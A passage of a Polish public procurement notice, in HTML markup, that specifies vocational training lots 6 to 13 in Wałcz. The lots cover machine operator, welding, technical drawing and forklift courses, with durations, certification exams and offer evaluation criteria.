zaświadczenie kwalifikacyjne zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. <br/>w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6: Kurs dla operatorów maszyn ziemnych – operator III klasy ładowarki jednonaczyniowej (dla osób dorosłych z wyłączeniem nauczycieli) <br/>a) Czas trwania: 134 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 16 osoby (2 grupy x 8 osób).<br/>e) Liczba edycji szkolenia: 2<br/>f) Terminy realizacji szkolenia: <br/>I edycja– do dnia 30 września 2025 r.<br/>II edycja – do dnia 31 grudnia 2025 r. <br/>g) Program szkolenia musi być realizowany zgodnie z programem nauczania w specjalności operator III klasy ładowarki jednonaczyniowej zatwierdzonym przez Sieć Badawcza Łukasiewicz Warszawski Instytut Technologiczny (dawniej Instytut Mechanizacji Budownictwa i Górnictwa Skalnego)<br/>h) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, kask, kamizelka)<br/>i) Szkolenie zakończy się sprawdzianem przed komisją powołaną przez Sieć Badawczą ŁUKASIEWICZ – Warszawski Instytut Technologiczny w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami)<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę operatora oraz świadectwo.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają potwierdzenie spełnienie wymagań, o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7: Kurs dla operatorów maszyn ziemnych - operator klasy III koparki jednonaczyniowej (dla osób dorosłych z wyłączeniem nauczycieli) <br/>a) Czas trwania: 134 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>c) Liczba uczestników: 16 osoby (2 grupy x 8 osób).<br/>d) Liczba edycji szkolenia: 2<br/>e) Terminy realizacji szkolenia: <br/>I edycja – do dnia 30 września 2025 r.<br/>II edycja – do dnia 31 grudnia 2025 r.<br/>f) Program szkolenia musi być realizowany zgodnie z programem nauczania w specjalności operator klasy III koparki jednonaczyniowej zatwierdzonym przez Sieć Badawcza Łukasiewicz Warszawski Instytut Technologiczny (dawniej Instytut Mechanizacji Budownictwa i Górnictwa Skalnego)<br/>g) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, kask, kamizelka)<br/>h) Szkolenie zakończy się sprawdzianem przed komisją powołaną przez Sieć Badawczą ŁUKASIEWICZ – Warszawski Instytut Technologiczny w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami)<br/>i) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę operatora oraz świadectwo.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają potwierdzenie spełnienie wymagań, o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 8: Kurs dla operatorów maszyn ziemnych - operator klasy III koparko-ładowarki (dla osób dorosłych z wyłączeniem nauczycieli) <br/>a) Czas trwania: 134 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>c) Liczba uczestników: 16 osoby (2 grupy x 8 osób).<br/>d) Liczba edycji szkolenia: 2 <br/>e) Terminy realizacji szkolenia: <br/>I edycja– do dnia 30 września 2025 r.<br/>II edycja – do dnia 31 grudnia 2025 r.<br/>f) Program szkolenia musi być realizowany zgodnie z programem nauczania w specjalności operator klasy III koparko-ładowarki zatwierdzonym przez Sieć Badawcza Łukasiewicz Warszawski Instytut Technologiczny (dawniej Instytut Mechanizacji Budownictwa i Górnictwa Skalnego)<br/>g) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, kask, kamizelka)<br/>h) Szkolenie zakończy się sprawdzianem przed komisją powołaną przez Sieć Badawczą ŁUKASIEWICZ – Warszawski Instytut Technologiczny w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami)<br/>i) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę operatora oraz świadectwo.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają potwierdzenie spełnienie wymagań, o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 9: Kurs spawania (dla osób dorosłych z wyłączeniem nauczycieli)<br/>Spawanie blach i rur spoinami pachwinowymi stali niestopowych metodą MAG 135 <br/>a) Czas trwania: 145 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz <br/>d) Liczba uczestników: 24 osoby (3 grupy x 8 osób).<br/>e) Liczba edycji szkolenia: 3 <br/>f) Terminy realizacji szkolenia: <br/>I edycja – do dnia 30 września 2025 r.<br/>II edycja – do dnia 30 września 2025 r.<br/>III edycja – do dnia 31 grudnia 2025 r. <br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: zastosowanie elektryczności do spawania łukowego; urządzenia spawalnicze; bezpieczeństwo i higiena pracy; bezpieczna praca na hali produkcyjnej; materiały dodatkowe do spawania; spawanie w praktyce; oznaczanie i wymiarowanie spoin; metody przygotowania złączy do spawania; kwalifikowanie spawaczy; budowa i użytkowanie urządzeń do spawania; Charakterystyka spawania MAG oraz typowe parametry; zajęcia praktyczne.<br/>h) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, rękawice spawalnicze)<br/>i) Szkolenie zakończy się egzaminem kwalifikacyjnym spawacza przed jednostką egzaminującą zgodnie z wymaganiami normy PN EN ISO 9606-1 Egzamin kwalifikacyjny spawacza – Spawanie – Część 1: Stale<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę spawacza oraz świadectwo egzaminu kwalifikacyjnego spawacza.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>- posiadają atest upoważniający do szkolenia i egzaminowania spawaczy<br/>- dysponują wykładowcami posiadającymi tytuł IWE / EWE oraz uprawnienia personelu badań nieniszczących VT – dotyczy prowadzenia zajęć teoretycznych i zagadnień związanych z procesami spawania<br/>- dysponują wykładowcami posiadającymi uprawnienia minimum inspektora bhp, uprawnienia inspektora ochrony przeciwpożarowej – dotyczy prowadzenia zajęć teoretycznych i zagadnień bezpieczeństwa i higieny pracy<br/>- dysponują instruktorami posiadającymi tytuł IWP (Międzynarodowy Instruktor Spawalniczy) oraz uprawnienia instruktora praktycznej nauki zawodu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 10: Kurs spawania (dla osób dorosłych z wyłączeniem nauczycieli)<br/>Spawanie blach i rur spoinami pachwinowymi stali nierdzewnych metodą TIG 141<br/>a) Czas trwania: 111 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz <br/>d) Liczba uczestników: 24 osoby (3 grupy x 8 osób).<br/>e) Liczba edycji szkolenia: 3 <br/>f) Terminy realizacji szkolenia: <br/>I edycja – do dnia 30 września 2025 r.<br/>II edycja – do dnia 30 września 2025 r.<br/>III edycja – do dnia 31 grudnia 2025 r.<br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: zastosowanie elektryczności do spawania łukowego; urządzenia spawalnicze; bezpieczeństwo i higiena pracy; bezpieczna praca na hali produkcyjnej; materiały dodatkowe do spawania; spawanie w praktyce; oznaczanie i wymiarowanie spoin; metody przygotowania złączy do spawania; kwalifikowanie spawaczy; budowa i użytkowanie urządzeń do spawania; elektrody wolframowe i materiały dodatkowe do spawania; podstawowe wiadomości o stalach nierdzewnych, metody spawania, ochrona zdrowia; spawalność, złącza spawane i odkształcenia złączy ze stali nierdzewnych; materiały dodatkowe do spawania stali nierdzewnych; korozja i obróbka cieplna po spawaniu; zajęcia praktyczne.<br/>h) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, rękawice spawalnicze)<br/>i) Szkolenie zakończy się egzaminem kwalifikacyjnym spawacza przed jednostką egzaminującą zgodnie z wymaganiami normy PN EN ISO 9606-1 Egzamin kwalifikacyjny spawacza – Spawanie – Część 1: Stale<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę spawacza oraz świadectwo egzaminu kwalifikacyjnego spawacza.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>- posiadają atest upoważniający do szkolenia i egzaminowania spawaczy<br/>- dysponują wykładowcami posiadającymi tytuł IWE / EWE oraz uprawnienia personelu badań nieniszczących VT – dotyczy prowadzenia zajęć teoretycznych i zagadnień związanych z procesami spawania (<br/>- dysponują wykładowcami posiadającymi uprawnienia minimum inspektora bhp, uprawnienia inspektora ochrony przeciwpożarowej – dotyczy prowadzenia zajęć teoretycznych i zagadnień bezpieczeństwa i higieny pracy<br/>- dysponują instruktorami posiadającymi tytuł IWP (Międzynarodowy Instruktor Spawalniczy) oraz uprawnienia instruktora praktycznej nauki zawodu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 11: Kurs dla operatorów maszyn ziemnych - Operator klasy III koparko-ładowarki (dla nauczycieli) <br/>a) Czas trwania: 134 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 2 osoby<br/>e) Liczba edycji szkolenia: 1 <br/>f) Terminy realizacji szkolenia: do dnia 31 grudnia 2025 r.<br/>g) Program szkolenia musi być realizowany zgodnie z programem nauczania w specjalności operator klasy III koparko-ładowarki zatwierdzonym przez Sieć Badawcza Łukasiewicz Warszawski Instytut Technologiczny (dawniej Instytut Mechanizacji Budownictwa i Górnictwa Skalnego).<br/>h) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, kask, kamizelka).<br/>i) Szkolenie zakończy się sprawdzianem przed komisją powołaną przez Sieć Badawczą ŁUKASIEWICZ – Warszawski Instytut Technologiczny w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami).<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę operatora oraz świadectwo.<br/>l) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają potwierdzenie spełnienie wymagań, o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia <br/>20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn <br/>i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 12: Szkolenie z zakresu posługiwania się rysunkiem technicznym (dla nauczycieli)<br/>a) Czas trwania: 40 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 6 osób<br/>e) Liczba edycji szkolenia: 1<br/>f) Terminy realizacji szkolenia: do dnia 31 grudnia 2025 r. <br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: podstawy rysunku; linie rysunkowe; rzutowanie; wymiarowanie i szkic; rysunek wykonawczy oraz złożeniowy; podstawy poruszania się w AUTO-CAD.<br/>h) Szkolenie zakończy się egzaminem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 13</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 13: Szkolenie operatorów urządzeń transportu bliskiego (dla nauczycieli) <br/>Operator wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia/ Operator podestów ruchomych przejezdnych<br/>a) Czas trwania: 37 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne<br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 3 osoby<br/>e) Liczba edycji szkolenia: 1<br/>f) Terminy realizacji szkolenia: do dnia 30 września 2025 r. <br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: znajomość przepisów prawnych w zakresie obsługi urządzeń; rodzaje urządzeń transportu bliskiego objęte zakresem uprawnienia; udźwig (charakterystyka udźwigu); pojęcie stateczności urządzenia; budowa urządzeń; mechanizmy oraz ich budowa i działanie; wyposażenie elektryczne, hydrauliczne, pneumatyczne; znajomość instrukcji eksploatacji w zakresie obsługi: czynności obsługującego przed przystąpieniem do pracy, w czasie pracy i po zakończeniu pracy, sterowanie mechanizmami urządzeń ogólnego przeznaczenia i specjalnych, sprawdzanie działania urządzeń zabezpieczających i hamulców itp.; niebezpieczne uszkodzenie / nieszczęśliwy wypadek – procedura postępowania; praca <br/>w specyficznych warunkach jak np.: praca zespołowa urządzeń, transport ładunku przez otwory w stropach, transport ludzi w koszu, praca w warunkach kolizyjnych, praca w pobliżu napowietrznych linii energetycznych i głębokich wykopów; zasady bezpiecznej eksploatacji wózków jezdniowych podnośnikowych zasilanych gazem (LPG); warunki bezpiecznej pracy przy obsłudze urządzeń.<br/>h) Szkolenie zakończy się egzaminem przed Urzędem Dozoru Technicznego w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych.<br/>i) Po pozytywnym wyniku egzaminu Uczestnik/czka otrzymuje zaświadczenie kwalifikacyjne zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. <br/>w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych. </p> <h3 